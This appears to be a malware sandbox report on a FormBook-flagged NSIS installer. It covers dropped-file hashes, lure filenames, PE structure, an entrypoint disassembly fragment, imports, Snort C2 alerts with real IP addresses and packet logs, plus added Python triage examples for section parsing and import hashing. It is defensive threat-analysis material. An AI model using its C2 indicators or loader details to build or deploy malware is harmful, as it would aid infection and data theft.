                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:9ob3S8T7kC7sf3eG3Jw24DKBGNLtqEZpG+x6t:iz7kC7sf3t3EFtpDGma
                                                                                                      MD5:AF69C1313ADD571627D87D2453F87D28
                                                                                                      SHA1:97818C9D2B9E8794F97D27CF0EBC2A763639F5E0
                                                                                                      SHA-256:6AFC732265B4C7257FF86EEE7AA8AD9E25DA0E0BA996CE425BDFF07EBF2B4349
                                                                                                      SHA-512:8C9E2FC2BADD92D495FAB633AC537842665F59B90D04CF2AAA8BDDBD06D25CEA631153C842F08C29AFE83129583D82CD48EFCD7DAA4CCAE3662A02563ED3ABC0
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11776
                                                                                                      Entropy (8bit):5.855045165595541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                                      • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                                      • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                                      • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                      • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                      • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                      • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                      • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                      • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                      • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                      • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                      • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                      • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                      • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                      • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      C:\Users\user\AppData\Local\Temp\x8abgzdx2taarfhvmdw
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):164352
                                                                                                      Entropy (8bit):7.998740117796754
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:WI3SWiaT7vg17lM7sf37lghuFa47Zrw24HAsFUyzyBGNmqDv:93S8T7kC7sf3eG3Jw24DKBGNLz
                                                                                                      MD5:D6A1573FFB40613104C0755D78241AB4
                                                                                                      SHA1:8567FBE29F2DE39618F8FC5EEAFB18F5C6B9D4AD
                                                                                                      SHA-256:B3132DA42852DD7F3C7BD9044AF9FB0916F9B8C6C6854B572F2CA6424CF2FECD
                                                                                                      SHA-512:6042A74B4572B2D04182EE3B8E6BF0D5518B4C752C887FB8AB770A5B8D385B5E58500EA4DE980227E577DABE9DD01B457F700ECECDA107180646DB8ADCE80981
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      C:\Users\user\AppData\Local\Temp\yerrxvolv
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):56945
                                                                                                      Entropy (8bit):4.916897762190798
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:5HwlaCciRuhiRUidh5HAYBe16mKqrk5US/zf6Up:NacPUXHl06pG+US/OO
                                                                                                      MD5:83D3E22048178472A2287533D5C2FE99
                                                                                                      SHA1:CA6E1F360EF458E914968D27963E2E821B281080
                                                                                                      SHA-256:98B4220FF7F5974B33154C161C82A814078FE0D670726F0C62CBCB17F9A0A8FE
                                                                                                      SHA-512:7151EEF108AFDCB5B7794718128973A4941197ED572AF9F20E68CB5637CC8DF2A17555765E45C101787EE7EB2D662C54E74EA5229890C90DB2C11CC24D1198F2
                                                                                                      Malicious:false
                                                                                                      Reputation:low

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.912728398567341
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:KY4cmAI0jU.exe
                                                                                                      File size:224710
                                                                                                      MD5:8c35ac8d43f7e59105902fa16114144e
                                                                                                      SHA1:c1a0e5de1121e55c22649182c923b41efd4e2848
                                                                                                      SHA256:1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
                                                                                                      SHA512:f89da0804389f71e3627b9bcc5299d6eaab0649197d1084fb3b6f63e4bd126baf333c9781aa02c3666ac59e79cb645487cfdbe19061b1c5119098529bfbd7f18
                                                                                                      SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ

                                                                                                      File Icon

                                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x40323c
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 00000180h
                                                                                                      push ebx
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      xor ebx, ebx
                                                                                                      push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409130h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F5D0CDC427Eh
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F458h
call dword ptr [00407158h]
push 004091B8h
push 004236A0h
call 00007F5D0CDC3F31h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F5D0CDC3F1Fh
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F5D0CDC167Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F5D0CDC3A12h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F5D0CDC16D5h
cmp cl, 00000020h
jne 00007F5D0CDC1678h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F5D0CDC166Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
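Two entries in this table deserve a second look: .data reserves 0x1af98 bytes in memory but carries only 0x400 bytes in the file, and .ndata has no file data at all (the name NSIS installer stubs give their uninitialized-data section). The Python below is an added example, not part of the report or of the sandbox's tooling: it parses a PE section table with the standard library alone and flags exactly those two conditions plus writable-and-executable sections. The image it parses is constructed in the block from the names, sizes and characteristics listed above with zero-filled section bodies, so its entropy values are 0.0 rather than the ones in the table, and the thresholds are my own.

```python
"""Parse a PE section table and flag what a triage analyst checks first:
writable+executable sections and sections whose in-memory size dwarfs the
bytes stored on disk (room for a payload that is written at run time)."""
import math
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = struct.Struct("<8sIIIIIIHHI")

# Constructed sample mirroring the Sections table above: (name, VA, VirtualSize, RawSize, Characteristics)
SAMPLE_SECTIONS = [
    (b".text", 0x1000, 0x5A5A, 0x5C00, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ),
    (b".rdata", 0x7000, 0x1190, 0x1200, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".data", 0x9000, 0x1AF98, 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_READ),
    (b".ndata", 0x24000, 0x8000, 0x0, IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_UNINITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (b".rsrc", 0x2C000, 0x9E0, 0xA00, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> list:
    """Follow MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section headers."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    off = coff + 20 + opt_size  # the section table follows the optional header
    sections = []
    for _ in range(num_sections):
        (name, vsize, va, raw_size, raw_ptr,
         _relocs, _lines, _nrelocs, _nlines, chars) = SECTION_HEADER.unpack_from(image, off)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va, "virtual_size": vsize, "raw_size": raw_size,
            "characteristics": chars,
            "entropy": shannon_entropy(image[raw_ptr:raw_ptr + raw_size]),
        })
        off += SECTION_HEADER.size
    return sections


def flag_section(sec: dict) -> list:
    """Thresholds are my own; tune them against your corpus."""
    flags, c = [], sec["characteristics"]
    if c & IMAGE_SCN_MEM_EXECUTE and c & IMAGE_SCN_MEM_WRITE:
        flags.append("writable+executable")  # self-modifying / in-place unpacking stub
    if sec["raw_size"] == 0 and c & IMAGE_SCN_CNT_UNINITIALIZED_DATA:
        flags.append("uninitialized (no file data)")  # BSS-style, what .ndata is
    elif sec["raw_size"] and sec["virtual_size"] > 4 * sec["raw_size"]:
        flags.append("virtual size >4x raw size")  # zero-filled at load; payload can land here
    if sec["entropy"] > 7.2:
        flags.append("high entropy (packed/encrypted?)")
    return flags


def build_sample_image() -> bytes:
    """Minimal PE32 carrying the five section headers above; section bodies are
    zero-filled, so entropies come out as 0.0 instead of the table's values."""
    img = bytearray(0x8000)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)  # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    coff, opt_size = 0x84, 0xE0  # IMAGE_FILE_HEADER offset, PE32 optional header size
    struct.pack_into("<HHIIIHH", img, coff, 0x14C, len(SAMPLE_SECTIONS), 0, 0, 0, opt_size, 0x0102)
    off, raw_ptr = coff + 20 + opt_size, 0x400
    for name, va, vsize, raw_size, chars in SAMPLE_SECTIONS:
        SECTION_HEADER.pack_into(img, off, name, vsize, va, raw_size,
                                 raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        raw_ptr += raw_size
        off += SECTION_HEADER.size
    return bytes(img)


if __name__ == "__main__":
    for sec in parse_sections(build_sample_image()):
        print(f"{sec['name']:<7} VA={sec['virtual_address']:#08x} VS={sec['virtual_size']:#08x} "
              f"raw={sec['raw_size']:#07x} H={sec['entropy']:.2f} {flag_section(sec)}")
```

On the real file the same walk reproduces the table above; the interesting output is the .data flag, since a loader-zeroed region more than a hundred times larger than its file backing is where a stub like this can place data it decrypts or extracts at run time without that content ever being visible in the static sections.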

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
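An import table like this one feeds two quick triage steps: the import hash (imphash), which pivots to other samples built from the same stub, and a capability read-out of what the imports let the binary do (process creation, registry writes, clipboard access, ExitWindowsEx for shutdown/reboot). The Python below is an added example, not the report's or pefile's own code. It reimplements the pefile imphash algorithm over a subset of the imports listed above, so the value it prints is the hash of that subset and not this sample's imphash; the capability buckets are my own mapping and not the sandbox's signature set.

```python
"""Import hash (imphash) and capability tagging for a PE import table."""
import hashlib

# Subset of the import table above (constructed for the example; hashing it
# yields the hash of this subset, not the sample's imphash).
SAMPLE_IMPORTS = {
    "KERNEL32.dll": ["CreateProcessA", "Sleep", "GetTickCount", "CreateFileA", "WriteFile",
                     "GetTempPathA", "CopyFileA", "LoadLibraryA", "LoadLibraryExA",
                     "GetProcAddress", "DeleteFileA", "RemoveDirectoryA", "WaitForSingleObject"],
    "USER32.dll": ["OpenClipboard", "SetClipboardData", "EmptyClipboard", "ExitWindowsEx"],
    "SHELL32.dll": ["ShellExecuteA", "SHFileOperationA"],
    "ADVAPI32.dll": ["RegQueryValueExA", "RegSetValueExA", "RegCreateKeyExA",
                     "RegDeleteKeyA", "RegDeleteValueA", "RegCloseKey"],
}

# Assumption: my own mapping of API names to behaviours, not the sandbox's rules.
CAPABILITIES = {
    "launches processes": {"CreateProcessA", "ShellExecuteA", "CreateThread"},
    "drops files": {"CreateFileA", "WriteFile", "CopyFileA", "MoveFileA", "GetTempPathA"},
    "removes files/directories": {"DeleteFileA", "RemoveDirectoryA", "SHFileOperationA"},
    "modifies registry": {"RegSetValueExA", "RegCreateKeyExA", "RegDeleteKeyA", "RegDeleteValueA"},
    "resolves APIs at runtime": {"LoadLibraryA", "LoadLibraryExA", "GetProcAddress"},
    "accesses clipboard": {"OpenClipboard", "SetClipboardData", "EmptyClipboard"},
    "shuts down / reboots": {"ExitWindowsEx"},
    "timing / delays": {"GetTickCount", "Sleep"},
}


def imphash(imports: dict) -> str:
    """pefile.get_imphash() algorithm: for every imported function build
    'library.function' with both parts lower-cased and a .dll/.ocx/.sys
    extension stripped from the library, join the list in import order with
    commas and MD5 it. Ordinal-only imports, which pefile resolves through a
    built-in ordinal-to-name table, are not handled here."""
    parts = []
    for dll, funcs in imports.items():
        lib = dll.lower()
        stem, _, ext = lib.rpartition(".")
        if ext in ("dll", "ocx", "sys"):
            lib = stem
        parts.extend(f"{lib}.{func.lower()}" for func in funcs)
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


def capabilities(imports: dict) -> dict:
    """Intersect the imported names with each bucket; keep only buckets that hit."""
    names = {f for funcs in imports.values() for f in funcs}
    return {cap: sorted(names & apis) for cap, apis in CAPABILITIES.items() if names & apis}


if __name__ == "__main__":
    print("imphash (subset):", imphash(SAMPLE_IMPORTS))
    for cap, hits in capabilities(SAMPLE_IMPORTS).items():
        print(f"  {cap:<28} {', '.join(hits)}")
```

Because the hash depends on import order and not just on the set of names, two binaries with the same imports in a different order hash differently; that is what makes it a fingerprint of the build, and why a stub that resolves its real APIs through LoadLibraryA/GetProcAddress (both present above) shows the loader's imports rather than the payload's.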

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-09:02:36.107449 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.3 | 172.67.206.33
06/11/21-09:02:36.107449 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.3 | 172.67.206.33
06/11/21-09:02:36.107449 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49730 | 80 | 192.168.2.3 | 172.67.206.33
06/11/21-09:02:57.061426 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 104.21.89.72
06/11/21-09:02:57.061426 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 104.21.89.72
06/11/21-09:02:57.061426 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49738 | 80 | 192.168.2.3 | 104.21.89.72
06/11/21-09:03:13.687930 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 3.34.12.41
06/11/21-09:03:13.687930 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 3.34.12.41
06/11/21-09:03:13.687930 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49742 | 80 | 192.168.2.3 | 3.34.12.41
06/11/21-09:03:33.391097 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 8.8.8.8
06/11/21-09:03:34.391709 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | - | - | 192.168.2.3 | 8.8.8.8

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 09:02:36.064456940 CEST | 49730 | 80 | 192.168.2.3 | 172.67.206.33
Jun 11, 2021 09:02:36.107199907 CEST | 80 | 49730 | 172.67.206.33 | 192.168.2.3
Jun 11, 2021 09:02:36.107331991 CEST | 49730 | 80 | 192.168.2.3 | 172.67.206.33
Jun 11, 2021 09:02:36.107449055 CEST | 49730 | 80 | 192.168.2.3 | 172.67.206.33
Jun 11, 2021 09:02:36.152012110 CEST | 80 | 49730 | 172.67.206.33 | 192.168.2.3
Jun 11, 2021 09:02:36.198753119 CEST | 80 | 49730 | 172.67.206.33 | 192.168.2.3
Jun 11, 2021 09:02:36.199132919 CEST | 49730 | 80 | 192.168.2.3 | 172.67.206.33
Jun 11, 2021 09:02:36.199173927 CEST | 80 | 49730 | 172.67.206.33 | 192.168.2.3
Jun 11, 2021 09:02:36.199248075 CEST | 49730 | 80 | 192.168.2.3 | 172.67.206.33
Jun 11, 2021 09:02:36.243094921 CEST | 80 | 49730 | 172.67.206.33 | 192.168.2.3
Jun 11, 2021 09:02:46.330689907 CEST | 49736 | 80 | 192.168.2.3 | 104.18.193.20
Jun 11, 2021 09:02:46.375637054 CEST | 80 | 49736 | 104.18.193.20 | 192.168.2.3
Jun 11, 2021 09:02:46.375842094 CEST | 49736 | 80 | 192.168.2.3 | 104.18.193.20
Jun 11, 2021 09:02:46.375958920 CEST | 49736 | 80 | 192.168.2.3 | 104.18.193.20
Jun 11, 2021 09:02:46.418087006 CEST | 80 | 49736 | 104.18.193.20 | 192.168.2.3
Jun 11, 2021 09:02:46.430977106 CEST | 80 | 49736 | 104.18.193.20 | 192.168.2.3
Jun 11, 2021 09:02:46.431135893 CEST | 80 | 49736 | 104.18.193.20 | 192.168.2.3
Jun 11, 2021 09:02:46.431207895 CEST | 49736 | 80 | 192.168.2.3 | 104.18.193.20
Jun 11, 2021 09:02:46.431240082 CEST | 49736 | 80 | 192.168.2.3 | 104.18.193.20
Jun 11, 2021 09:02:46.473290920 CEST | 80 | 49736 | 104.18.193.20 | 192.168.2.3
Jun 11, 2021 09:02:51.532536030 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.728164911 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.728344917 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.728471041 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.927200079 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.927234888 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.927257061 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.927275896 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.927292109 CEST | 80 | 49737 | 173.234.255.253 | 192.168.2.3
Jun 11, 2021 09:02:51.927546978 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.927597046 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.927602053 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:51.927604914 CEST | 49737 | 80 | 192.168.2.3 | 173.234.255.253
Jun 11, 2021 09:02:57.018436909 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:02:57.061005116 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
Jun 11, 2021 09:02:57.061249018 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:02:57.061425924 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:02:57.103861094 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
Jun 11, 2021 09:02:57.445303917 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
Jun 11, 2021 09:02:57.445329905 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
Jun 11, 2021 09:02:57.445338964 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
